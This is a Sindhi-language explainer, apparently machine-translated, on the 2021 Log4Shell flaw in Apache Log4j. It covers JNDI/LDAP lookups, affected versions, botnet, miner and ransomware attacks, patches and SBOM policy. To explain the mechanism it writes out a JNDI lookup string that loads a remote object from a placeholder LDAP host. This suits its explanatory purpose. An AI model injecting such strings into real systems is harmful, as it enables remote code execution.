مواد جي جدول[لڪ][ڏسو]
نومبر 2021 جي آخر ۾، اسان سائبر سيڪيورٽي لاءِ هڪ وڏو خطرو ظاهر ڪيو. اهو استحصال ممڪن طور تي سڄي دنيا ۾ لکين ڪمپيوٽر سسٽم کي متاثر ڪندو.
هي Log4j جي ڪمزوري تي هڪ گائيڊ آهي ۽ ڪيئن هڪ نظر انداز ٿيل ڊيزائن جي نقص 90 سيڪڙو کان مٿي دنيا جي ڪمپيوٽر سروسز تي حملي لاءِ کليل آهي.
Apache Log4j هڪ اوپن سورس جاوا تي ٻڌل لاگنگ يوٽيلٽي آهي جيڪا Apache Software Foundation پاران تيار ڪئي وئي آهي. اصل ۾ 2001 ۾ Ceki Gülcü پاران لکيل آهي، اهو هاڻي Apache Logging Services جو حصو آهي، Apache Software Foundation جو هڪ پروجيڪٽ.
سڄي دنيا ۾ ڪمپنيون استعمال ڪن ٿيون Log4j لائبريري انهن جي ايپليڪيشنن تي لاگنگ کي فعال ڪرڻ لاءِ. حقيقت ۾، جاوا لائبريري تمام وسيع آهي، توهان ان کي Amazon، Microsoft، Google، ۽ وڌيڪ کان ايپليڪيشنن ۾ ڳولي سگهو ٿا.
لائبريري جي اهميت جو مطلب آهي ته ڪوڊ ۾ ڪنهن به امڪاني نقص لکين ڪمپيوٽرن کي هيڪنگ لاءِ کليل ڇڏي سگهي ٿو. 24 نومبر 2021 تي، اي ڪلائوڊ سيڪيورٽي علي بابا لاءِ ڪم ڪندڙ محقق هڪ خوفناڪ نقص دريافت ڪيو.
Log4j جي ڪمزوري، جنهن کي Log4Shell جي نالي سان پڻ سڃاتو وڃي ٿو، 2013 کان ڪنهن جو به ڌيان نه ڏنو ويو آهي. نقصانڪار ڪارڪردگيءَ کي اجازت ڏني وئي ته اهي Log4j هلائيندڙ متاثر سسٽم تي ڪوڊ هلائي سگهن. اهو 9 ڊسمبر 2021 تي عوامي طور تي ظاهر ڪيو ويو
صنعت جا ماهر سڏين ٿا Log4Shell جي غلطي تازي ياداشت ۾ سڀ کان وڏو نقصان.
خطري جي اشاعت کانپوءِ هفتي ۾ ، سائبر سيڪيورٽي ٽيمن لکين حملن جو پتو لڳايو. ڪجهه محققن هڪ منٽ کان وڌيڪ حملن جي شرح به ڏٺي.
ان کي ڪيئن ڪم ڪندو؟
سمجھڻ لاءِ ڇو Log4Shell ايترو خطرناڪ آھي، اسان کي سمجھڻ گھرجي ته اھو ڇا جي قابل آھي.
Log4Shell نقصان جي اجازت ڏئي ٿو صوابديدي ڪوڊ تي عمل ڪرڻ، جنهن جو بنيادي مطلب اهو آهي ته هڪ حملو ڪندڙ ٽارگيٽ مشين تي ڪنهن به حڪم يا ڪوڊ کي هلائي سگهي ٿو.
اهو ڪيئن پورو ڪري ٿو؟
پهرين، اسان کي سمجهڻ جي ضرورت آهي ته JNDI ڇا آهي.
Java Naming and Directory Interface (JNDI) هڪ جاوا سروس آهي جيڪا جاوا پروگرامن کي هڪ نالي ذريعي ڊيٽا ۽ وسيلن کي ڳولڻ ۽ ڳولڻ جي اجازت ڏئي ٿي. اهي ڊاريڪٽري خدمتون اهم آهن ڇو ته اهي ڊولپرز لاءِ رڪارڊ جو هڪ منظم سيٽ مهيا ڪن ٿيون آساني سان حوالو ڏيڻ لاءِ جڏهن ايپليڪيشنون ٺاهڻ.
JNDI هڪ خاص ڊاريڪٽري تائين رسائي حاصل ڪرڻ لاء مختلف پروٽوڪول استعمال ڪري سگھن ٿا. انهن مان هڪ پروٽوڪول لائيٽ ويٽ ڊاريڪٽري رسائي پروٽوڪول، يا LDAP آهي.
جڏهن هڪ تار کي لاگ ان ڪريو، لاگ 4 جي اسٽرنگ متبادل کي انجام ڏئي ٿو جڏهن اهي فارم جي اظهار کي منهن ڏين ٿا ${prefix:name}
.
مثال طور، Text: ${java:version}
متن جي طور تي لاگ ان ٿي سگھي ٿو: جاوا ورزن 1.8.0_65. ان قسم جا متبادل عام آهن.
اسان وٽ پڻ اظهار ڪري سگهون ٿا جهڙوڪ Text: ${jndi:ldap://example.com/file}
جيڪو LDAP پروٽوڪول ذريعي URL مان جاوا اعتراض لوڊ ڪرڻ لاءِ JNDI سسٽم استعمال ڪري ٿو.
اهو مؤثر طريقي سان انهي URL مان ايندڙ ڊيٽا کي مشين ۾ لوڊ ڪري ٿو. ڪو به امڪاني هيڪر عوامي URL تي بدسلوڪي ڪوڊ ميزباني ڪري سگهي ٿو ۽ لاگ 4j استعمال ڪندي مشينن جو انتظار ڪري ان کي لاگ ان ڪرڻ لاءِ.
جيئن ته لاگ پيغامن جي مواد ۾ صارف جي ڪنٽرول ٿيل ڊيٽا شامل آهي، هيڪرز پنهنجون JNDI حوالا داخل ڪري سگھن ٿا جيڪي LDAP سرور ڏانهن اشارو ڪن ٿا جيڪي اهي ڪنٽرول ڪن ٿا. اهي LDAP سرور خراب جاوا شين سان ڀريل هوندا جن کي JNDI خطري جي ذريعي عمل ڪري سگهي ٿو.
ڇا اهو بدترين بڻائي ٿو ته اهو مسئلو ناهي ته ايپليڪيشن سرور-سائيڊ يا ڪلائنٽ سائڊ ايپليڪيشن آهي.
جيستائين لاگر کي حملي ڪندڙ جي بدسلوڪي ڪوڊ پڙهڻ لاء هڪ طريقو آهي، ايپليڪيشن اڃا تائين استحصال لاء کليل آهي.
ڪير متاثر ٿيو آهي؟
نقصان سڀني سسٽم ۽ خدمتن کي متاثر ڪري ٿو جيڪي APache Log4j استعمال ڪن ٿا، ورجن 2.0 تائين ۽ 2.14.1 سميت.
ڪيترائي سيڪيورٽي ماهر صلاح ڏين ٿا ته ڪمزوري جاوا استعمال ڪندي ڪيترن ئي ايپليڪيشنن کي متاثر ڪري سگھي ٿي.
نقص پهريون ڀيرو Microsoft جي ملڪيت واري Minecraft ويڊيو گيم ۾ دريافت ڪيو ويو. Microsoft انهن جي استعمال ڪندڙن تي زور ڏنو آهي ته انهن جي جاوا ايڊيشن Minecraft سافٽ ويئر کي اپڊيٽ ڪرڻ لاء ڪنهن به خطري کي روڪڻ لاء.
جين ايسٽرلي، سائبر سيڪيورٽي ۽ انفراسٽرڪچر سيڪيورٽي ايجنسي (سي آء ايس اي) جي ڊائريڪٽر جو چوڻ آهي ته وينڊرز وٽ هڪ آهي وڏي ذميواري آخر استعمال ڪندڙن کي بدڪاري ڪندڙ اداڪارن کان روڪڻ لاءِ جيڪي هن ڪمزوريءَ جو استحصال ڪن ٿا.
"وينڊرز کي پڻ انهن جي گراهڪن سان گفتگو ڪرڻ گهرجي ته يقيني بڻائڻ لاءِ ته آخر صارفين کي خبر آهي ته انهن جي پراڊڪٽ ۾ هي ڪمزوري شامل آهي ۽ سافٽ ويئر اپڊيٽ کي ترجيح ڏيڻ گهرجي."
اطلاعن موجب حملا شروع ٿي چڪا آهن. Symantec، هڪ ڪمپني جيڪا مهيا ڪري ٿي سائبر سيڪيورٽي سافٽ ويئر، مختلف قسم جي حملي جي درخواستن جو مشاهدو ڪيو آهي.
هتي حملن جي قسمن جا ڪجهه مثال آهن جيڪي محقق ڳوليا آهن:
- botnets
Botnets ڪمپيوٽرن جو ھڪڙو نيٽ ورڪ آھن جيڪي ھڪڙي حملي ڪندڙ پارٽي جي ڪنٽرول ھيٺ آھن. اهي DDoS حملن کي انجام ڏيڻ، ڊيٽا چوري ڪرڻ، ۽ ٻين اسڪيمن ۾ مدد ڪن ٿا. محقق Log4j استحصال مان ڊائون لوڊ ڪيل شيل اسڪرپٽ ۾ Muhstik botnet جو مشاهدو ڪيو.
- XMRig Miner Trojan
XMRig هڪ اوپن سورس cryptocurrency Miner آهي جيڪو استعمال ڪري ٿو CPUs کي مائنر ڪرڻ لاءِ Monero ٽوڪن. سائبر ڪرمنلز ماڻهن جي ڊوائيسن تي XMRig انسٽال ڪري سگھن ٿا ته جيئن اهي پنهنجي پروسيسنگ پاور کي انهن جي ڄاڻ کان سواءِ استعمال ڪري سگهن.
- Khonsari Ransomware
Ransomware مان مراد مالويئر جو ھڪڙو روپ آھي جيڪو ٺاھيو ويو آھي encrypt فائلون ڪمپيوٽر تي. حملو ڪندڙ وري انڪرپٽ ٿيل فائلن تائين رسائي ڏيڻ جي بدلي ۾ ادائيگي جو مطالبو ڪري سگهن ٿا. محقق Log4Shell حملن ۾ Khonsari ransomware دريافت ڪيو. اهي ونڊوز سرورز کي ٽارگيٽ ڪن ٿا ۽ .NET فريم ورڪ جو استعمال ڪن ٿا.
اڳتي ڇا ٿيو؟
ماهرن جي اڳڪٿي ڪئي وئي آهي ته Log4J جي ڪمزوري جي ڪري پيدا ٿيل افراتفري کي مڪمل طور تي ٺيڪ ڪرڻ ۾ مهينا يا شايد سال به لڳي سگهن ٿا.
اهو عمل شامل آهي هر متاثر ٿيل سسٽم کي پيچ ٿيل ورزن سان تازه ڪاري ڪرڻ. جيتوڻيڪ اهي سڀئي سسٽم پيچ ڪيا ويا آهن، اڃا به ممڪن آهي ته پوئتي دروازن جو خطرو آهي ته هيڪرز شايد اڳ ۾ ئي ونڊو ۾ شامل ڪيو هجي ته سرور حملي لاء کليل هئا.
ڪيتريون ئي حل ۽ گھٽتائي موجود آهن ايپليڪيشنن کي هن بگ جي استحصال کان روڪڻ لاءِ. نئون Log4j ورجن 2.15.0-rc1 مختلف سيٽنگون تبديل ڪيون ھن نقصان کي گھٽائڻ لاءِ.
JNDI استعمال ڪندي سڀ خصوصيتون ڊفالٽ طور بند ڪيون وينديون ۽ ريموٽ ڏسندڙن کي پڻ محدود ڪيو ويو آھي. توھان جي Log4j سيٽ اپ تي ڏسڻ واري خصوصيت کي غير فعال ڪرڻ سان ممڪن استحصال جي خطري کي گھٽائڻ ۾ مدد ملندي.
Log4j کان ٻاهر، اوپن سورس استحصال کي روڪڻ لاءِ اڃا به وسيع منصوبي جي ضرورت آهي.
ان کان اڳ مئي ۾، وائيٽ هائوس هڪ جاري ڪيو انتظامي حڪم جنهن جو مقصد قومي سائبر سيڪيورٽي کي بهتر بڻائڻ آهي. ان ۾ مواد جي سافٽويئر بل (SBOM) لاءِ هڪ روزي شامل هئي جيڪا بنيادي طور تي هڪ رسمي دستاويز هئي جنهن ۾ ايپليڪيشن ٺاهڻ لاءِ گهربل هر شيءِ جي فهرست شامل هئي.
ھن ۾ حصا شامل آھن جھڙوڪ کليل ذريعو پيڪيجز، انحصار، ۽ APIs ترقي لاء استعمال ڪيا ويا. جيتوڻيڪ SBOMs جو خيال شفافيت لاء مددگار آهي، ڇا اهو واقعي صارفين جي مدد ڪندو؟
اپ گريڊ انحصار شايد تمام گهڻو پريشان ٿي سگھي ٿو. ڪمپنيون صرف متبادل پيڪيجز ڳولڻ ۾ اضافي وقت ضايع ڪرڻ جي خطري جي بجاءِ ڪو به جرمانو ادا ڪرڻ جو انتخاب ڪري سگهن ٿيون. شايد اهي SBOMs صرف ڪارائتو هوندا جيڪڏهن انهن جي گنجائش وڌيڪ محدود آهي.
ٿڪل
Log4j مسئلو صرف تنظيمن لاء ٽيڪنيڪل مسئلو کان وڌيڪ آهي.
ڪاروباري اڳواڻن کي امڪاني خطرن کان آگاهي ٿيڻ گهرجي جيڪي ٿي سگهي ٿي جڏهن انهن جا سرور، پروڊڪٽس، يا خدمتون ڪوڊ تي ڀاڙين ٿيون جيڪي اهي پاڻ برقرار نٿا رکن.
اوپن سورس ۽ ٽئين پارٽي ايپليڪيشنن تي ڀروسو ڪرڻ هميشه ڪجهه خطري سان گڏ اچي ٿو. نئين خطرن جي روشني ۾ اچڻ کان اڳ ڪمپنين کي خطري جي گھٽتائي واري حڪمت عملي تي ڪم ڪرڻ گهرجي.
ويب جو گهڻو حصو اوپن سورس سافٽ ويئر تي ڀاڙي ٿو جيڪو پوري دنيا ۾ هزارين رضاڪارن طرفان رکيو ويو آهي.
جيڪڏهن اسان چاهيون ٿا ته ويب کي هڪ محفوظ جڳهه، حڪومتن ۽ ڪارپوريشنن کي فنڊ ڏيڻ ۾ سيڙپڪاري ڪرڻ گهرجي اوپن سورس ڪوششون ۽ سائبر سيڪيورٽي ايجنسيون جهڙوڪ سي اي ايس اي.
جواب ڇڏي وڃو